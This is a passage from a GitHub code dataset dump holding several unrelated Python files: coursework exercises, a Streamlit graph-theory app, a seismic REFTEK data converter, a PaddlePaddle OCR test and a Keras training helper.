for sample_size in [10, 20, 100]:\n sample_means = []\n for i in range(1000):\n sample = [np.random.exponential(1/6.) for i in range(sample_size)]\n sample_avg = np.mean(sample)\n standardized_avg = standardize(sample_avg)\n sample_means.append(standardized_avg)\n \n plt.hist(sample_means)\n","repo_name":"jColeChanged/MIT","sub_path":"Statistical Thinking and Data Analysis 15.075/assignment_2.py","file_name":"assignment_2.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5325545019","text":"# from Module 3\n\nmy_list = [10, 1, 8, 3, 5]\nlength = len(my_list)\n\nfor i in range(length // 2):\n my_list[i], my_list[length - i - 1] = my_list[length - i - 1], my_list[i]\n\nprint(my_list)\n\n # we've assigned the length variable with the current list's length (this makes our code a bit clearer and shorter)\n # we've launched the for loop to run through its body length // 2 times (this works well for lists with both even and odd lengths, because when the list contains an odd number of elements, the middle one remains untouched)\n # we've swapped the ith element (from the beginning of the list) with the one with an index equal to (length - i - 1) (from the end of the list); in our example, for i equal to 0 the (length - i - 1) gives 4; for i equal to 1, it gives 3 - this is exactly what we needed.","repo_name":"aitimis/PythonCourse","sub_path":"CourseApps/SwapElemLists.py","file_name":"SwapElemLists.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28836306325","text":"import streamlit as st\nfrom graph_utils import Graph, open_graph_txt, MinimumPath, Components\nfrom graph_utils import DFSL as DFS\nfrom graph_utils import BFSL as BFS\n\nimport mpu\nimport base64\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\n\ndef get_table_download_link_csv(df, filename=\"file.txt\", label=\"Download file\", index=False):\n csv = df.to_csv(index=index).encode()\n b64 = base64.b64encode(csv).decode()\n href = f'<a href=\"data:file/csv;base64,{b64}\" download=\"{filename}\">{label}</a>'\n return href\n\ndef main():\n st.title(\"COS242 - Primeiro trabalho prático\")\n st.header(\"UFRJ - Escola Politécnica - Eng. de Computação e Informação\")\n menu = [\"Carregar grafo\", \"Representação do grafo\", \"Estatísticas\", \n \"BFS\", \"DFS\", \"Caminhos mínimos\", \"Componentes conexas\"]\n choice = st.sidebar.selectbox(\"Opções\", menu)\n \n graph_txt = None\n graph = None\n\n \n\n if choice == \"Carregar grafo\":\n st.subheader(\"Carregar um grafo através de um arquivo txt\")\n
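 # (added comment) unsafe_allow_html=True below lets the raw <div>/<p> markup in this string be rendered as HTML by Streamlit's markdown widget.\n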
 st.markdown(\"\"\"\n <div>\n <p>Faça upload de um arquivo contendo um grafo, onde a primeira linha é o número de vértices, as próximas linhas são as arestas, e a última linha em branco ou com um ponto.</p>\n <p>Exemplo:</p>\n <p>3<br>1 2<br>2 3<br>.</p>\n </div>
\n \"\"\", unsafe_allow_html = True)\n graph_txt = st.file_uploader(\"Upload do Grafo (.txt)\", type=\"txt\")\n if graph_txt:\n graph_txt_button = st.button(\"Ler Grafo\")\n if graph_txt_button:\n graph = open_graph_txt(graph_txt)\n graph.sort_neighbors()\n mpu.io.write(\"graph.pickle\", graph)\n st.success(f\"Grafo com {graph.n_nodes} nós carregado com sucesso!\")\n st.header(\"Limpar grafo\")\n limpar = st.button(\"Limpar\")\n if limpar:\n try:\n os.remove(\"graph.pickle\")\n except:\n pass\n st.success(\"Grafo excluído com sucesso!\")\n \n elif choice == \"Representação do grafo\":\n st.subheader(\"Representação do grafo\")\n st.markdown(\"\"\"\n
<div>\n <p>Um grafo pode ser tanto representado como uma matriz de adjacência, como listas de adjacência.</p>\n <p>Escolha a opção desejada para baixar o arquivo de representação.</p>\n </div>
\n \"\"\", unsafe_allow_html = True)\n try:\n graph = mpu.io.read(\"graph.pickle\")\n matriz = st.button(\"Gerar matriz de adjacência\")\n listas = st.button(\"Gerar listas de adjacência\")\n if matriz:\n st.success(\"Matriz de adjacência gerada com sucesso!\")\n st.markdown(get_table_download_link_csv(graph.get_matrix_beautiful(), \"matriz.csv\", \"Download matriz de adjacência (.csv)\", index=True), \n unsafe_allow_html=True)\n if listas:\n lista_json = json.dumps(graph.get_node_edges()).encode()\n b64 = base64.b64encode(lista_json).decode()\n href = f'Download listas de adjacência (.txt)'\n st.success(\"Listas de adjacência gerada com sucesso!\")\n st.markdown(href, unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n elif choice == \"Estatísticas\":\n st.header(\"Estatísticas do grafo\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.markdown(f\"\"\"\n
 st.markdown(f\"\"\"\n <div>\n <p>Número de vértices: {int(graph.n_nodes)}</p>\n <p>Número de arestas: {int(graph.get_matrix().sum()/2)}</p>\n <p>Grau mínimo: {int(graph.get_matrix().sum(axis=0).min())}</p>\n <p>Grau máximo: {int(graph.get_matrix().sum(axis=0).max())}</p>\n <p>Grau médio: {graph.get_matrix().sum(axis=0).mean()}</p>\n <p>Mediana do Grau: {np.median(graph.get_matrix().sum(axis=0))}</p>\n </div>
\n \"\"\", unsafe_allow_html = True)\n\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"BFS\":\n st.header(\"Busca em lagura (BFS)\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.text(f\"Escolha qual nó para ser a raiz (1 - {graph.n_nodes}) e pressione Enter para atualizar o valor\")\n root = st.text_input(\"Raiz\", 1)\n if root:\n button = st.button(\"Rodar BFS\")\n if button:\n try:\n bfs = BFS(graph, int(root))\n bfs.search()\n st.success(f\"BFS rodada com sucesso!\")\n st.markdown(get_table_download_link_csv(pd.DataFrame(list(zip(range(1, bfs.graph.n_nodes+1), bfs.level, bfs.parent)), columns=[\"node\", \"level\", \"parent\"], index=np.arange(1, bfs.graph.n_nodes+1)),\n f\"bfs_{root}.csv\", f\"Download BFS do vértice {root} (.csv)\"), unsafe_allow_html=True)\n except:\n st.error(\"Raiz informada não contém no grafo.\")\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"DFS\":\n st.header(\"Busca em profundidade (DFS)\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.text(f\"Escolha qual nó para ser a raiz (1 - {graph.n_nodes}) e pressione Enter para atualizar o valor\")\n root = st.text_input(\"Raiz\", 1)\n if root:\n button = st.button(\"Rodar DFS\")\n print(root)\n if button:\n try:\n dfs = DFS(graph, int(root))\n dfs.search()\n st.success(f\"DFS rodada com sucesso!\")\n st.markdown(get_table_download_link_csv(pd.DataFrame(list(zip(range(1, dfs.graph.n_nodes+1), dfs.level, dfs.parent)), columns=[\"node\", \"level\", \"parent\"], index=np.arange(1, dfs.graph.n_nodes+1)),\n f\"dfs_{root}.csv\", f\"Download DFS do vértice {root} (.csv)\"), unsafe_allow_html=True)\n except:\n st.error(\"Raiz informada não contém no grafo.\")\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n elif choice == \"Caminhos mínimos\":\n st.header(\"Calcular distância entre dois nós\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n minpath = MinimumPath(graph) \n v = st.text_input(\"Origem\", 1)\n w = st.text_input(\"Destino\", 2)\n button = st.button(\"Calcular\")\n if button and minpath:\n st.text(f\"Diâmetro do grafo: {minpath.get_diameter()}\")\n st.text(f\"Distância entre {v} e {w}: {minpath.get_distance(int(v), int(w))}\")\n st.header(\"Distância entre todos os vértices\")\n st.markdown(get_table_download_link_csv(minpath.get_matrix_beautiful(), \"distancias.csv\", \"Download matriz com todas as distâncias (.csv)\", index=True), unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"Componentes conexas\":\n st.header(\"Componentes conexas\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n button = st.button(\"Gerar componentes conexas\")\n if button:\n components = Components(graph)\n components_dict = {len(x):x for x in components.components}\n components_json = json.dumps(components_dict).encode()\n b64 = base64.b64encode(components_json).decode()\n href = f'Download das componentes (.txt) '\n st.success(f\"Componentes geradas com sucesso!\")\n st.markdown(href, unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. 
Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"Criado por Henrique Chaves e Pedro Boechat - 2020.2\")\n\n if not graph:\n st.sidebar.text(\"Nenhum grafo carregado.\")\n \n else:\n st.sidebar.text(f\"Grafo com {graph.n_nodes} vértices carregado.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n","repo_name":"henchaves/cos242-graph-theory","sub_path":"project_01/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10618084960","text":"import errno\nimport os\n\nfrom .file_storage import FileStorage\n\n\nclass LocalStorage(FileStorage):\n\tdef __init__(self, app):\n\t\tsuper().__init__(app)\n\n\tdef exists(self, path: str):\n\t\treturn os.path.exists(self.full_path(path))\n\n\tdef save(self, path: str, payload):\n\t\tpath = self.full_path(path)\n\n\t\tdirname = os.path.dirname(path)\n\n\t\tif not os.path.exists(dirname):\n\t\t\ttry:\n\t\t\t\tos.makedirs(dirname)\n\t\t\texcept OSError as e:\n\t\t\t\tif e.errno != errno.EEXIST:\n\t\t\t\t\traise\n\n\t\tif not os.path.isdir(dirname):\n\t\t\traise IOError('Not a directory')\n\n\t\ttry:\n\t\t\tfile = open(path, \"wb\")\n\t\t\tfile.write(payload)\n\t\t\tfile.close()\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Failed to save file\")\n\n\tdef load(self, path: str):\n\t\ttry:\n\t\t\tfile = open(self.full_path(path), \"rb\")\n\t\t\tdata = file.read()\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Failed to load file {}\".format(path))\n\n\t\treturn data\n","repo_name":"XertDev/book_repository","sub_path":"book_repository/extensions/file_provider/file_storage/local_storage.py","file_name":"local_storage.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25957341811","text":"import numpy as np\r\nimport os\r\nimport cv2 as cv\r\n\r\ndef sectioner(img, section, folder):\r\n \"\"\"This function designates which part is saved, and saves it to the assigned folder\"\"\"\r\n if section == '1':\r\n img = img[0:480,0:640]\r\n elif section == '2':\r\n img = img[0:480, 640:1280]\r\n elif section == '3':\r\n img = img[0:480, 1280:1920]\r\n elif section == '4':\r\n img = img[480:960, 0:640]\r\n elif section == '5':\r\n img = img[480:960, 640:1280]\r\n elif section == '6':\r\n img = img[480:960, 1280:1920]\r\n\r\n cv.imwrite(folder, img)\r\n\r\ndef line_drawer(img):\r\n cv.line(img, (0, 480), (1920, 480), (255, 0, 0), 3)\r\n cv.line(img, (640, 0), (640, 960), (255, 0, 0), 3)\r\n cv.line(img, (1280, 0), (1280, 960), (255, 0, 0), 3)\r\n return img\r\n\r\ndef main():\r\n print(\"\"\"\r\n Sections\r\n 1 - Top Left\r\n 2 - Top Middle\r\n 3 - Top Right\r\n 4 - Bottom Left\r\n 5 - Bottom Middle\r\n 6 - Bottom Right\r\n \"\"\")\r\n section = None\r\n file_images = os.listdir('train_file') # load the images as a list\r\n image_index = 0 # start from first image\r\n viable_strings = ['1', '2', '3', '4', '5', '6', 'None'] # display available options for input\r\n print(\"Press q to quit the program\")\r\n input(\"\\nPress Enter to begin\")\r\n while (image_index < len(file_images))and (section != 'q'):\r\n img = cv.imread('train_file/'+file_images[image_index])\r\n img = img[60:1020, 0:1920]\r\n line_drawer(img)\r\n img = cv.resize(img, (1300, 650))\r\n cv.imshow(file_images[image_index], img)\r\n cv.waitKey(0)\r\n\r\n # if 
cv.waitKey(100) and 0xFF == 32:\r\n # cv.destroyAllWindows()\r\n section = input(\"Which section is the part in?: \")\r\n img = cv.imread('train_file/'+file_images[image_index])\r\n img = img[60:1020, 0:1920]\r\n if section in viable_strings:\r\n if section == 'None':\r\n pass\r\n else:\r\n folder = 'train_file_save/sectioned_'+file_images[image_index]\r\n sectioner(img, section, folder)\r\n cv.destroyAllWindows()\r\n image_index += 1\r\n\r\n elif section == 'q':\r\n break\r\n else:\r\n print(\"That is not a viable option\")\r\n print(\"Exiting the program\")\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n print(\"\\nthis is a component program, not the main program\")\r\n\r\n\r\n","repo_name":"rip3045/VisionSystem","sub_path":"image_sectioner.py","file_name":"image_sectioner.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"26724755945","text":"import os\nimport pexpect\nimport obspy\nimport numpy as np\n\nfrom datetime import datetime, timezone, timedelta\nimport glob\nimport subprocess\n\ndef scan_data_holding(path):\n result=[]\n for day in glob.glob(os.path.join(path,\"???????\") ):\n d=os.path.split(day)[-1]\n for f in glob.glob(os.path.join(day, '????', '1', '*')) :\n t=os.path.split(f)[-1]\n tt, duration = t.split('_')\n duration=int(duration, 16)\n t0=datetime.strptime(d + tt, \"%Y%j%H%M%S%f\")\n t1=t0+ timedelta(milliseconds=duration)\n result.append( (f,[t0, t1]) )\n\n return result\n\ndef fetch_data(pool):\n \n in_dir = pool.pars['input_dir']\n out_dir = pool.pars['output_dir']\n out_format = pool.pars['output_data_format']\n\n ##tempory diretory to store\n pool.pars[\"tmp_dir\"] = \"__reftek_temp_dir__\"\n if not os.path.exists(pool.pars[\"tmp_dir\"]):\n os.makedirs(pool.pars[\"tmp_dir\"])\n\n #for key, station in pool.stations.items():\n\n ##do not need anymore at present\n #station[\"local_data_holding\"]=scan_data_holding(os.path.join(in_dir, station[\"network\"].strip(), station[\"name\"].strip()))\n\n for sId, eId in pool.all_data:\n station = pool.stations[sId]\n event = pool.events[eId]\n rr = {}\n\n stnet = station[\"network\"].strip()\n stnm = station[\"name\"].strip()\n\n if pool.pars[\"data_apply_mode\"] == \"per_station\":\n if not os.path.exists(os.path.join(out_dir, stnet, stnm)):\n os.makedirs(os.path.join(out_dir, stnet, stnm))\n out_path = os.path.join(out_dir, stnet, stnm)\n elif pool.pars[\"data_apply_mode\"] == \"per_event\":\n if not os.path.exists(os.path.join(out_dir, str(eId))):\n os.makedirs(os.path.join(out_dir, str(eId)))\n out_path = os.path.join(out_dir, 'event' + str(eId))\n \n t0=pool.all_data[(sId, eId)][\"time_range\"][0]\n t1=pool.all_data[(sId, eId)][\"time_range\"][1]\n\n tr=fetch_reftek_data(station, pool.pars, t0, t1 )\n if len(tr)==0: #data not found\n continue\n\n if out_format.lower().strip() == \"sac\":\n\n p=os.path.join(out_path, station[\"network\"] +\".\"+ station[\"name\"] + \".\" + t1.strftime(\"%Y%j%H%M%S\"))\n add_sac_head(tr, station, event)\n\n ##for masked trace data, not needed anymore\n # for trace in tr:\n # if isinstance(trace.data, np.ma.masked_array):\n # trace.data = trace.data.filled()\n tr.write(p+\".sac\", format=\"SAC\")\n elif out_format.lower().strip() == \"segy\":\n pass\n else:\n pass\n return \n\ndef add_sac_head(stream, station, event):\n\n head={}\n head[\"kstnm\"]=station[\"name\"]\n head[\"stla\"]=station[\"latitude\"]\n head[\"stlo\"]=station[\"longitude\"]\n head[\"evla\"]=event[\"latitude\"]\n 
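# (added comment) SAC header convention, as I understand it: evla/evlo/evdp are the\n # event latitude/longitude/depth, and further down cmpinc/cmpaz give each component's\n # inclination from vertical and azimuth from north - Z is (0, 0), N is (90, 0), E is (90, 90)\n 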
head[\"evlo\"]=event[\"longitude\"]\n head[\"evdp\"]=event[\"depth\"]\n head[\"mag\"]=event[\"magnitude\"]\n\n #for vertical Z component\n head[\"cmpinc\"]=0\n head[\"kcmpnm\"]=\"Z\"\n head[\"cmpaz\"]=0\n stream[0].stats.sac = head\n stream[0].stats.station=station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"Z\"\n\n #for N component\n head[\"cmpinc\"]=90\n head[\"kcmpnm\"]=\"N\"\n head[\"cmpaz\"]=0\n stream[1].stats.sac=head\n stream[0].stats.station = station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"N\"\n\n #for E component\n head[\"cmpinc\"]=90\n head[\"kcmpnm\"]=\"E\"\n head[\"cmpaz\"]=90\n stream[2].stats.sac=head\n stream[0].stats.station = station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"E\"\n\ndef fetch_reftek_data(station,pars, t0, t1):\n tr = obspy.Stream()\n\n #clean up the tmp_dir\n for f in glob.glob(os.path.join(pars[\"tmp_dir\"], \"*\")):\n os.remove(f)\n\n in_dir = pars['input_dir']\n out_dir = pars['output_dir']\n out_format = pars['output_data_format']\n out_path=os.path.join(out_dir, station[\"network\"], station[\"name\"])\n\n t0=t0.strftime('%Y:%j:%H:%M:%S.%f')\n t1=t1.strftime('%Y:%j:%H:%M:%S.%f')\n cmd = \"arcfetch \" + os.path.join(in_dir, station[\"network\"], station[\"name\"]) + \" -C *,*,*,\" + t0 + \",\" + t1 + \" \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\")\n\n status, output = subprocess.getstatusoutput(cmd)\n if \"No archive error\" in output:\n print(cmd)\n print(output)\n print(\"Please check the data archive have the right archive.sta file. \")\n print('If not, use commond \"arcrebuild -Ypass \" to rebuild it.')\n exit(1)\n\n\n if out_format.lower().strip() == \"sac\":\n cmd = \"pas2sac \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") +\" \"+ pars[\"tmp_dir\"]\n status, output = subprocess.getstatusoutput(cmd)\n elif out_format.lower() == \"asc\":\n os.system(\"pas2asc \"+os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") +\" \"+ pars[\"tmp_dir\"])\n elif out_format.lower() == \"msd\":\n os.system(\"pas2msd \"+os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") + \" \"+pars[\"tmp_dir\"])\n elif out_format.lower() == \"segy\":\n os.system(\"pas2segy \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\")+ \" \" + pars[\"tmp_dir\"])\n\n for f in glob.glob(os.path.join(pars[\"tmp_dir\"], t0[0:4]+\"*\")):\n tr+=obspy.read(f)\n\n\n\n return tr\n\n\ndef fetch_data_by_obspy(t1, t2, station):\n ##failed, due to the obspy do not fully support reftek data\n tr = obspy.Stream()\n file_list=find_match_files(t1,t2, station)\n\n if not file_list: ### no file found\n return tr\n\n for f in file_list:\n tr+=obspy.read(f, component_codes=[\"Z\",\"N\",\"E\"])\n tr.merge(method=1, interpolation_samples=0)\n\n T1=obspy.UTCDateTime(t1.replace(tzinfo=timezone.utc).timestamp() )\n T2=obspy.UTCDateTime(t2.replace(tzinfo=timezone.utc).timestamp() )\n tr.trim(T1, T2)\n return tr\n\n \ndef find_match_files(t1,t2, station):\n result=[]\n station[\"local_data_holding\"]\n for path, [tt1, tt2] in station[\"local_data_holding\"]:\n if not (tt2\")\n str0 = \"read \" + item[\"path\"] + \"/\" + item[\"time\"].strftime(\"%Y%j%H%M%S\") + \"*\"\n sac.sendline(str0)\n\n sac.expect(\"SAC>\")\n str0 = \"ch \" + \" evla \" + str(item['event'][\"latitude\"]) + \\\n \" evlo \" + str(item['event'][\"longitude\"]) + \\\n \" evdp \" + str(item['event'][\"depth\"])\n sac.sendline(str0)\n\n sac.expect(\"SAC>\")\n sac.sendline(\"wh\")\n\n sac.expect(\"SAC>\")\n sac.sendline(\"q\")\n\n 
return 0\n","repo_name":"FrankLiu007/obspyDQ","sub_path":"obspyDQ/reftek.py","file_name":"reftek.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72341183846","text":"from string import ascii_lowercase, digits\n\nclass CardCheck:\n CHARS_FOR_NAME = ascii_lowercase.upper() + digits\n @classmethod\n def check_card_number(cls, number):\n if len(number.split(sep='-')) == 4 and len(set(number.replace('-','')) - set(cls.CHARS_FOR_NAME)) == 0 and len(number) == 19 and number.replace('-', '').isdigit():\n return True\n else:\n return False\n\n @classmethod\n def check_name(cls, name):\n if len(name.split(sep=' ')) == 2 and len(set(name.replace(' ', '')) - set(cls.CHARS_FOR_NAME)) == 0:\n return True\n else:\n return False\n\nis_number = CardCheck.check_card_number(\"1234-5678-9012-0000\")\nis_name = CardCheck.check_name(\"SERGEI BALAkIREV\")\nprint(is_name, is_number)\n","repo_name":"vbogoduhov/OOP_Python_stepik","sub_path":"1. Первые шаги в ООП/1.7 Методы класса и статические методы/ex_1.7.8.py","file_name":"ex_1.7.8.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71645696805","text":"import sys\nimport cv2\n\nfrom kernel.model.baidu_pp_wrapper import PpDetection, PpOCR\n\n\nclass PPWrapperTest:\n def __init__(self):\n self.pp_detection_test = PpDetection()\n self.pp_ocr_test = PpOCR()\n\n def test_predict_video(self, camera_id):\n \"\"\"\n Test identification object\n\n @param camera_id: Camera port number\n \"\"\" \n capture = cv2.VideoCapture(camera_id)\n \n index = 1\n while 1:\n ret, frame = capture.read()\n if not ret:\n break\n print('detect frame:%d' % (index))\n index += 1\n \n im,results = self.pp_detection_test.detect_img(frame)\n for box in results['boxes']:\n\n # Class, English, Chinese\n label_id = box[0].astype(int)\n print('##', label_id, self.pp_detection_test.labels_en[label_id], self.pp_detection_test.labels_zh[label_id-1])\n\n if camera_id != -1:\n cv2.imshow('Mask Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n def test_ocr(self, input_path):\n \"\"\"\n test ocr read image text\n\n \"\"\"\n image_dir = input_path\n img = cv2.imread(image_dir)\n src_im, text_list = self.pp_ocr_test.ocr_image(img)\n print(text_list)\n cv2.imwrite('../../sample/test_ocr.jpg', src_im)\n\n\nif __name__ == '__main__':\n pp_wrapper_test = PPWrapperTest()\n pp_wrapper_test.test_ocr(input_path=\"../../sample/test.png\")\n pp_wrapper_test.test_predict_video(0)\n","repo_name":"CrashKingOrz/ppReader-Kernel","sub_path":"kernel/test/pp_wrapper_test.py","file_name":"pp_wrapper_test.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9057099475","text":"from BaseModel import BaseModel\nfrom Defintions import Defintions\nimport DatabaseLayer\n\n\n\nclass StoryModels(BaseModel):\n \"\"\"\n This will be the base class for all of models that are used as parts of \n other models. Maily, this will refer to Zone and Monster.\n\n Do not try to use this class directly. 
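Concrete subclasses are expected to supply get_dbFields() (used by set_common_story_property below).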
 Only use its subclasses\n \"\"\"\n \n \n\n @classmethod\n def construct_model_from_dict(cls,dict):\n \"\"\"\n args:\n dict:\n a dict from which the model's properties are loaded.\n\n return: an instance of the model on which this is called\n\n \"\"\"\n obj = cls(None)\n obj.dict = dict\n return obj\n\n def __init__(self,definitionKey):\n \"\"\"\n args:\n definitionKey:\n a string dictionary key used with one of the definition classes. The hashed value\n is a sub-dict that contains the definition info\n\n \"\"\"\n super().__init__()\n self._definition = None\n if not definitionKey:\n return\n self.definitionKey = definitionKey\n\n def set_common_story_property(self,key,value):\n \"\"\"\n I noticed that I was using the same two lines all over my setters.\n So, I decided to just centralize it here.\n \"\"\"\n self.dict[key] = value\n self._changes[self.get_dbFields().OWNER_PROPERTY + \".\" +key] = value\n\n","repo_name":"joelliusczar/SpaceHabit","sub_path":"SpaceHabitRPG/Models/StoryModels.py","file_name":"StoryModels.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6028627541","text":"import time\nimport pandas as pd\nimport os\nimport numpy as np\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__)))\nfrom vutils import load_settings\nfrom keras import models, Input, Model\nfrom keras.callbacks import EarlyStopping\n\n\nsettings = load_settings()\nlabels2int = {b: a for a, b in enumerate(settings[\"labels\"])}\n\nlandmark_indices = [0, 11, 12, 13, 14, 15, 16, 23, 24]\n\n\n# convert landmarks to only selected landmarks\ndef convert(landmarks):\n result = []\n for index in landmark_indices:\n landmark = landmarks[index]\n \"\"\"without visibility\"\"\"\n result.extend([landmark.x, landmark.y, landmark.z])\n \"\"\"with visibility\"\"\"\n # result.extend([landmark.x, landmark.y, landmark.z, landmark.visibility])\n return result\n\n\n# offset according to previous frame\ndef offset(curr, prev):\n \"\"\"without visibility\"\"\"\n result = [a - b for a, b in zip(curr, prev)]\n \"\"\"with visibility\"\"\"\n # result = [v[0] - v[1] if i%4!=3 else v[0] for i, v in enumerate(zip(curr, prev))]\n return result\n\n\ndef convert_df_labels(df1, labels2int):\n df = df1.copy()\n for i in range(len(df)):\n label = df[\"label\"][i]\n df.at[i, \"label\"] = labels2int[label]\n return df\n\n\ndef split_data_with_label(df, valid_size, test_size):\n df_input = df.copy()\n df_target = df_input.pop(\"label\")\n groups = {}\n current_group_label = None\n current_group = []\n for i, row in enumerate(df_input.itertuples(index=False)):\n if current_group_label is None:\n current_group_label = df_target[i]\n if current_group_label == df_target[i]:\n current_group.append(row)\n else:\n groups[current_group_label] = groups.get(current_group_label, [])\n groups[current_group_label].append(current_group)\n current_group_label = df_target[i]\n current_group = []\n if len(current_group):\n groups[current_group_label] = groups.get(current_group_label, [])\n groups[current_group_label].append(current_group)\n\n x_train, x_valid, x_test = [], [], []\n y_train, y_valid, y_test = [], [], []\n for label, group in groups.items():\n # random.shuffle(group)\n combined = [j for i in group for j in i]\n n_test = int(len(combined) * test_size)\n n_valid = int(len(combined) * valid_size)\n n_train = len(combined) - n_test - n_valid\n for i in range(len(combined)):\n (\n x_train if i < n_train else x_valid if i < n_train + 
 n_valid else x_test\n ).append(combined[i])\n (\n y_train if i < n_train else y_valid if i < n_train + n_valid else y_test\n ).append(label)\n return (\n np.array(x_train),\n np.array(y_train),\n np.array(x_valid),\n np.array(y_valid),\n np.array(x_test),\n np.array(y_test),\n )\n\n\ndef split_data_without_label(df, valid_size, test_size):\n df_input = df.copy()\n df_target = df_input.pop(\"label\")\n x_train, x_valid, x_test = [], [], []\n y_train, y_valid, y_test = [], [], []\n n_test = int(len(df_input) * test_size)\n n_valid = int(len(df_input) * valid_size)\n n_train = len(df_input) - n_test - n_valid\n for i, row in enumerate(df_input.itertuples(index=False)):\n (\n x_train if i < n_train else x_valid if i < n_train + n_valid else x_test\n ).append(row)\n (\n y_train if i < n_train else y_valid if i < n_train + n_valid else y_test\n ).append(df_target[i])\n return [(x_train, y_train), (x_valid, y_valid), (x_test, y_test)]\n\n\ndef split_data(DATA, VALID_RATIO, TEST_RATIO):\n DBs = [\n pd.read_csv(os.path.join(\"data\", f\"{name}.csv\"), index_col=0) for name in DATA\n ]\n DB = pd.concat(DBs, axis=0, ignore_index=True, sort=False)\n DB = convert_df_labels(DB, labels2int)\n\n return split_data_without_label(DB, VALID_RATIO, TEST_RATIO)\n\n\ndef group_data(data, group_size, target_function):\n x, y = data\n x_result = []\n y_result = []\n x_temp = []\n y_temp = []\n for i in x:\n x_temp.append(i)\n if len(x_temp) == group_size:\n x_result.append(x_temp)\n x_temp = []\n for i in y:\n y_temp.append(i)\n if len(y_temp) == group_size:\n # result.append(sum(y_temp) / group_size / 2)\n y_result.append(target_function(y_temp))\n y_temp = []\n\n return np.array(x_result), np.array(y_result)\n\n\nclass ModelOperation:\n def __init__(\n self,\n model_class,\n data,\n max_epochs=100,\n valid_ratio=0.1,\n test_ratio=0.1,\n early_stop_valid_patience=10,\n early_stop_train_patience=5,\n num_train_per_config=10,\n loss='mse',\n metrics=['mse'],\n verbose=0,\n test_data=None\n ):\n self.max_epochs = max_epochs\n self.early_stop_valid_patience = early_stop_valid_patience\n self.early_stop_train_patience = early_stop_train_patience\n self.num_train_per_config = num_train_per_config\n self.loss = loss\n self.metrics = metrics\n self.verbose = verbose\n\n self.counter = 0\n self.model_class = model_class\n self.base_model = model_class.model\n self.preprocess = False\n self.preprocessor = None\n self.layer_options = [None] * len(self.base_model.layers)\n\n # x_train, y_train, x_valid, y_valid, x_test, y_test\n self.raw_data = split_data(data, valid_ratio, test_ratio)\n self.test_data = test_data\n\n\n self.defalut_params = {\n \"batchsize\": 16,\n \"timestamp\": 32,\n \"optimizer\": \"adam\",\n \"preprocess\": None,\n }\n\n self.model = None\n self.final_data = None\n self.params = self.defalut_params\n self.history = None\n\n def run(self):\n raise Exception(\"run method must be defined for ModelOperation\")\n\n def build(self):\n # Reconstruct model\n layers = self.base_model.layers\n input_shape = self.final_data[0][0].shape[1:]\n print(self.final_data[0][0].shape)\n input_layer = Input(shape=input_shape)\n current_layer = input_layer\n for i, option in enumerate(self.layer_options[1:]):\n layer = layers[i + 1]\n config = layer.get_config()\n if option is not None:\n for k, v in option.items():\n config[k] = v\n current_layer = layer.__class__(**config)(current_layer)\n model = Model(inputs=input_layer, outputs=current_layer)\n if self.verbose:\n model.summary()\n return model\n\n def train(self, 
